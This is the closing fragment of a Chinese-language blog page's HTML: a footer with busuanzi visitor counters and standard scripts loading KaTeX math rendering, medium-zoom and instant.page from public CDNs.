                    <span id="busuanzi_container_site_uv">本站访客数&nbsp;<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" class="icon busuanzi-site-uv"><path d="M224 256c70.7 0 128-57.3 128-128S294.7 0 224 0 96 57.3 96 128s57.3 128 128 128zm89.6 32h-16.7c-22.2 10.2-46.9 16-72.9 16s-50.6-5.8-72.9-16h-16.7C60.2 288 0 348.2 0 422.4V464c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48v-41.6c0-74.2-60.2-134.4-134.4-134.4z"/></svg>&nbsp;<span id="busuanzi_value_site_uv"></span></span>&nbsp;|&nbsp;<span id="busuanzi_container_site_pv">本站访问量&nbsp;<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512" class="icon busuanzi-site-pv"><path d="M288 144a110.94 110.94 0 0 0-31.24 5 55.4 55.4 0 0 1 7.24 27 56 56 0 0 1-56 56 55.4 55.4 0 0 1-27-7.24A111.71 111.71 0 1 0 288 144zm284.52 97.4C518.29 135.59 410.93 64 288 64S57.68 135.64 3.48 241.41a32.35 32.35 0 0 0 0 29.19C57.71 376.41 165.07 448 288 448s230.32-71.64 284.52-177.41a32.35 32.35 0 0 0 0-29.19zM288 400c-98.65 0-189.09-55-237.93-144C98.91 167 189.34 112 288 112s189.09 55 237.93 144C477.1 345 386.66 400 288 400z"/></svg>&nbsp;<span id="busuanzi_value_site_pv"></span></span>
                </div>

            


            
        </div>
    </footer>


        </div>
        

        
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.13.0/dist/katex.min.css" integrity="sha256-gPJfuwTULrEAAcI3X4bALVU/2qBU+QY/TpoD3GO+Exw=" crossorigin="anonymous">
<script>
    if (typeof renderMathInElement === 'undefined') {
        var getScript = (options) => {
            var script = document.createElement('script');
            script.defer = true;
            script.crossOrigin = 'anonymous';
            Object.keys(options).forEach((key) => {
                script[key] = options[key];
            });
            document.body.appendChild(script);
        };
        getScript({
            src: 'https://cdn.jsdelivr.net/npm/katex@0.13.0/dist/katex.min.js',
            integrity: 'sha256-YTW9cMncW/ZQMhY69KaUxIa2cPTxV87Uh627Gf5ODUw=',
            onload: () => {
                getScript({
                    src: 'https://cdn.jsdelivr.net/npm/katex@0.13.0/dist/contrib/mhchem.min.js',
                    integrity: 'sha256-yzSfYeVsWJ1x+2g8CYHsB/Mn7PcSp8122k5BM4T3Vxw=',
                    onload: () => {
                        getScript({
                            src: 'https://cdn.jsdelivr.net/npm/katex@0.13.0/dist/contrib/auto-render.min.js',
                            integrity: 'sha256-fxJzNV6hpc8tgW8tF0zVobKa71eTCRGTgxFXt1ZpJNM=',
                            onload: () => {
                                renderKaTex();
                            }
                        });
                    }
                });
            }
        });
    } else {
        renderKaTex();
    }
    function renderKaTex() {
        renderMathInElement(
            document.body,
            {
                delimiters: [
                    {left: "$$", right: "$$", display: true},
                    {left: "\\[", right: "\\]", display: true},
                    {left: "$", right: "$", display: false},
                    {left: "\\(", right: "\\)", display: false}
                ]
            }
        );
    }
</script>










    <script src="https://cdn.jsdelivr.net/npm/medium-zoom@latest/dist/medium-zoom.min.js"></script>

<script>
    mediumZoom(document.querySelectorAll('div.post-body img'), {
        background: 'hsla(var(--color-bg-h), var(--color-bg-s), var(--color-bg-l), 0.95)'
    })
</script>




    <script src="https://cdn.jsdelivr.net/npm/instant.page@5.1.0/instantpage.min.js" type="module" defer></script>




    
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    




    </body>
</html>
